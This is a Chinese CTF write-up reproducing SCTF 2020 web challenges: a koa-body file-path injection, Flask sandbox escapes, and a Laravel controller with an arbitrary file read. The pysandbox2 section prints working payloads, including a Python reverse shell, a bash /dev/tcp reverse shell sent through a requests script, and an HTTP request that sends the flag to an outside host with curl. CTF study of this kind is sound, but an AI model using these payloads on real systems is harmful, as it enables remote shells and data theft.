2020SCTFWeb题目复现

SCTF几道Web题目复现

0x01 CloudDisk

https://github.com/dlau/koa-body/issues/75

1
2
{"files":{"file":{"name":"aaa","path":"/proc/self/cwd/flag"}}}
{"files":{"file":{"name":"aaa","path":"/app/flag"}}}

0x02 pysandbox

W&M

利用request.args、request.method和修改static_folder

背景知识:

  • flask目录结构

    /app.py

    /templates

    ​ /index.html

    /static

    ​ /style.css

    可以利用app.static_folder=//设置为静态目录

  • request.method POST

  • request.args POST=/

image-20200708100928461

访问/static/flag

image-20200708100958032

另一种方法

利用app.root_path[:1]取得/

image-20200708103617752

0x02 pysandbox2

Nepnep

背景知识:

builtins模块提供对Python的所有“内置”标识符的直接访问,里面包含python的内置函数。作为一个实现细节,大多数模块都将名称 __builtins__ 作为其全局变量的一部分提供。 __builtins__ 的值通常是这个模块或者这个模块的值 __dict__ 属性。这一点在SSTI中用的比较多。

image-20200708104304296

可以利用__builtins__.__dict__['ord']=lambda args:42重写ord()函数。

lambda arguments : expression

lambda*args:expression

image-20200708103125255

之后就可以绕过security的检测。

image-20200708104958779

然后就可以执行任意代码。

1
2
3
4
5
__builtins__.ord=lambda*args:42

__import__("os").popen("curl  ip:8888")

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

image-20200708110333343

还有另一种方法,可以将结果回显

1
app.view_functions['security']=lambda: __import__('os').popen('id').read()

image-20200708111330602

L-team

1
2
3
4
5
6
7
import requests 
print(requests.post('http://39.104.90.30:10005', data={
	'cmd':
    'Flask.__doc__=request.form[secret[0]];'
    'app.make_response=lambda*p:Flask.__doc__;'
    'app.process_response=exec',
    'F': "__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/my_ip/23333 0>&1'\")" }))

oxcccccc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /?a=__import__('os').system('curl+http%3a//ccreater.top%3a60000/+-d+`cat+flag|base64`') HTTP/1.1
Host: 39.104.90.30:10006
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://39.104.90.30:10006/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx3B8HB5b
Content-Length: 248

------WebKitFormBoundaryx3B8HB5b
Content-Disposition: form-data; name="cmd"

request.args.__class__.__getattr__=request.args.__class__.__getitem__;app.config.__class__.__eq__=eval;app.config==request.args.a;
------WebKitFormBoundaryx3B8HB5b--

__getattr__:

__getitem__:

__eq__:

0x04 bestlanguage

路由:

1
2
3
4
5
6
7
8
9
#routes/web.php

Route::get('/',"IndexController@init");
Route::post('/rm',"IndexController@rm");
Route::get('/tmp/{filename}', function ($filename) {
    readfile("/var/tmp/".$filename);
})->where('filename', '(.*)');
Route::post('/upload',"IndexController@upload");
Route::get('/move/log/{filename}', 'IndexController@moveLog')->where('filename', '(.*)');
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#\App\Http\Controllers\IndexController.php
<?php


namespace App\Http\Controllers;


class IndexController extends Controller
{
    public function init(){
        if($_SERVER["REMOTE_ADDR"] !== "127.0.0.1" && strpos($_SERVER["REMOTE_ADDR"],"192.168.") !== 0 && strpos($_SERVER["REMOTE_ADDR"],"10.") !== 0 )  {
            die("admin only");
        }
        if(!file_exists("/var/tmp/".md5($_SERVER["REMOTE_ADDR"]))){
            mkdir("/var/tmp/".md5($_SERVER["REMOTE_ADDR"]));
        }
    }
    public function rm(){
        if(strpos($_POST["filename"], '../') !== false) die("???");
        if(file_exists("/var/".$_POST["filename"])){
            if(is_dir("/var/".$_POST["filename"])){
                rmdir("/var/".$_POST["filename"]);
                echo "rmdir";
            }
            else{
                unlink("/var/".$_POST["filename"]);
                echo "unlink";
            }
        }
    }
    public function upload()
    {

        if(strpos($_POST["filename"], '../') !== false) die("???");
        file_put_contents("/var/tmp/".md5($_SERVER["REMOTE_ADDR"])."/".$_POST["filename"],base64_decode($_POST["content"]));
        echo "/var/tmp/".md5($_SERVER["REMOTE_ADDR"])."/".$_POST["filename"];
    }

    public function moveLog($filename)
    {

        $data =date("Y-m-d");
        if(!file_exists(storage_path("logs")."/".$data)){
            mkdir(storage_path("logs")."/".$data);
        }
        $opts = array(
            'http'=>array(
                'method'=>"GET",
                'timeout'=>1,//单位秒
            )
        );

        $content = file_get_contents("http://127.0.0.1/tmp/".md5('127.0.0.1')."/".$filename,false,stream_context_create($opts));
        file_put_contents(storage_path("logs")."/".$data."/".$filename,$content);
        echo storage_path("logs")."/".$data."/".$filename;
    }

image-20200708174824735

任意文件读取,这里需要加上index.php。否则不会成功。

image-20200708174534642

0x05 Login Me

image-20200708211540390

0X06 Login Me Aagin

image-20200708211553620